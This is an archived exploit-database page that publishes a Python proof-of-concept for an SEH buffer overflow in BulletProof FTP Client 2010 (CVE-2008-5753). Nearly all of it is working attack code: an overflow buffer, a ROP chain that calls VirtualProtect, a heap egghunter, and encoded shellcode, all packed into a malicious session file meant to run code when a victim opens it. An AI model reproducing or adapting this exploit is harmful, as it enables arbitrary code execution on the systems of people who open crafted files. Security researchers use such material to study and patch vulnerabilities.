what you don't know can hurt you

BulletProof FTP Client 2010 Buffer Overflow

BulletProof FTP Client 2010 Buffer Overflow
Posted May 18, 2015
Authored by His0k4, Gabor Seljan

BulletProof FTP Client 2010 buffer overflow SEH exploit.

tags | exploit, overflow
advisories | CVE-2008-5753, OSVDB-50968
MD5 | b22fe16b92e084f68b053e5c314bfbd5

BulletProof FTP Client 2010 Buffer Overflow

Change Mirror Download
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #
# Date: Feb 15 2015 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP SP3 English #
# Credits: His0k4 #
# CVE: CVE-2008-5753 #
#-----------------------------------------------------------------------------#

#!/usr/bin/python

from struct import pack

# offset to SEH is 93 byte
buf = b'A' * 13
buf += pack('<L',0x77c1f62f) # POP ECX # POP ECX # POP EDI # POP EBX # POP EBP # RETN [msvcrt.dll]
buf += b'A' * 20
buf += pack('<L',0x74c86a99) # POP ESI # RETN [oleacc.dll]
buf += b'A' * 4
buf += pack('<L',0x77c4dca8) # ADD ESP,2C # RETN [msvcrt.dll]
buf += b'A' * 18
buf += pack('<L',0x77c1c47f) # POP EBX # POP EBP # RETN 10 [msvcrt.dll]
buf += b'A' * 8
buf += pack('<L',0x74c86a9a) # RETN [oleacc.dll]
buf += b'A' * 10
buf += b'\xce\xc3\x40' # ADD ESP,400 # POP ESI # POP EBX # RETN [bpftpclient.exe]

# ROP chain
rop_gadgets = b''
rop_gadgets += pack('<L',0x77c364d5) # POP EBP # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c364d5) # skip 4 bytes [msvcrt.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0xfffffafe) # Value to negate, will become 0x00000501
rop_gadgets += pack('<L',0x7ca82222) # NEG EAX # RETN [shell32.dll]
rop_gadgets += pack('<L',0x77227494) # XCHG EAX,EBX # RETN [WININET.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0xffffffc0) # Value to negate, will become 0x00000040
rop_gadgets += pack('<L',0x771bcbe4) # NEG EAX # RETN [WININET.dll]
rop_gadgets += pack('<L',0x77f124c8) # XCHG EAX,EDX # RETN [GDI32.dll]
rop_gadgets += pack('<L',0x77c2c343) # POP ECX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c605b5) # &Writable location [msvcrt.dll]
rop_gadgets += pack('<L',0x77c23b47) # POP EDI # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c39f92) # RETN (ROP NOP) [msvcrt.dll]
rop_gadgets += pack('<L',0x77c34d9a) # POP ESI # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c2aacc) # JMP [EAX] [msvcrt.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c11120) # ptr to &VirtualProtect() [IAT msvcrt.dll]
rop_gadgets += pack('<L',0x77c12df9) # PUSHAD # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c35524) # ptr to 'push esp # ret ' [msvcrt.dll]


# heap-only egghunter
hunter = b'\x6a\x30\x5a' # PUSH 30 # POP EDX
hunter += b'\x64\x8b\x12' # MOV EDX, DWORD PTR FS:[EDX]
hunter += b'\x80\xc2\x90' # ADD DL,90
hunter += b'\x8b\x12' # MOV EDX, DWORD PTR [EDX]
hunter += b'\x8b\x12' # MOV EDX, DWORD PTR [EDX]
hunter += b'\xeb\x05' # JMP SHORT
hunter += b'\x66\x81\xca\xff\x0f' # OR DX,0FFF
hunter += b'\x42\x52' # INC EDX # PUSH EDX
hunter += b'\x6a\x02\x58' # PUSH 2 # POP EAX
hunter += b'\xcd\x2e' # INT 2E
hunter += b'\x3c\x05' # CMP AL,5
hunter += b'\x5a' # POP EDX
hunter += b'\x74\xef' # JE SHORT
hunter += b'\xb8\x77\x30\x30\x74' # MOV EAX, w00t
hunter += b'\x89\xd7' # MOV EDI,EDX
hunter += b'\xaf' # SCAS DWORD PTR ES:[EDI]
hunter += b'\x75\xea' # JNZ SHORT
hunter += b'\xaf' # SCAS DWORD PTR ES:[EDI]
hunter += b'\x75\xe7' # JNZ SHORT

# copy shellcode back to stack
strcpy = b'\x8b\xec' # MOV EBP,ESP
strcpy += b'\x57\x55\x55' # PUSH EDI # PUSH EBP # PUSH EBP
strcpy += b'\x68\x30\x60\xc4\x77' # PUSH ptr to &strcpy [msvcrt.dll]
strcpy += b'\xc3' # RET

egg = 'w00t'.encode()

# msfvenom -p windows/exec -b '\x00\x0d\x0a\x1a' -e x86/shikata_ga_nai cmd=calc.exe
shellcode = b''
shellcode += b'\xdb\xd1\xb8\xda\x92\x2c\xca\xd9\x74\x24\xf4\x5a\x31'
shellcode += b'\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xce\x70'
shellcode += b'\xd9\x36\x06\xf6\x22\xc7\xd6\x97\xab\x22\xe7\x97\xc8'
shellcode += b'\x27\x57\x28\x9a\x6a\x5b\xc3\xce\x9e\xe8\xa1\xc6\x91'
shellcode += b'\x59\x0f\x31\x9f\x5a\x3c\x01\xbe\xd8\x3f\x56\x60\xe1'
shellcode += b'\x8f\xab\x61\x26\xed\x46\x33\xff\x79\xf4\xa4\x74\x37'
shellcode += b'\xc5\x4f\xc6\xd9\x4d\xb3\x9e\xd8\x7c\x62\x95\x82\x5e'
shellcode += b'\x84\x7a\xbf\xd6\x9e\x9f\xfa\xa1\x15\x6b\x70\x30\xfc'
shellcode += b'\xa2\x79\x9f\xc1\x0b\x88\xe1\x06\xab\x73\x94\x7e\xc8'
shellcode += b'\x0e\xaf\x44\xb3\xd4\x3a\x5f\x13\x9e\x9d\xbb\xa2\x73'
shellcode += b'\x7b\x4f\xa8\x38\x0f\x17\xac\xbf\xdc\x23\xc8\x34\xe3'
shellcode += b'\xe3\x59\x0e\xc0\x27\x02\xd4\x69\x71\xee\xbb\x96\x61'
shellcode += b'\x51\x63\x33\xe9\x7f\x70\x4e\xb0\x15\x87\xdc\xce\x5b'
shellcode += b'\x87\xde\xd0\xcb\xe0\xef\x5b\x84\x77\xf0\x89\xe1\x88'
shellcode += b'\xba\x90\x43\x01\x63\x41\xd6\x4c\x94\xbf\x14\x69\x17'
shellcode += b'\x4a\xe4\x8e\x07\x3f\xe1\xcb\x8f\xd3\x9b\x44\x7a\xd4'
shellcode += b'\x08\x64\xaf\xb7\xcf\xf6\x33\x16\x6a\x7f\xd1\x66'

identifier = b'This is a BulletProof FTP Client Session-File and should not be modified directly.'
host = buf
port = b'21'
name = b'B' + rop_gadgets + hunter + strcpy
password = b'bpfmcidchffddknejf'
local = egg + egg + shellcode

sploit = b"\r\n".join([identifier, host, port, name, password, local])

try:
print('[*] Creating exploit file...')
f = open('sploit.bps', 'wb')
f.write(sploit)
f.close()
print('[*] sploit.bps file successfully created!')
except:
print('[!] Error while creating exploit file!')

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    15 Files
  • 4
    Apr 4th
    5 Files
  • 5
    Apr 5th
    5 Files
  • 6
    Apr 6th
    27 Files
  • 7
    Apr 7th
    31 Files
  • 8
    Apr 8th
    18 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close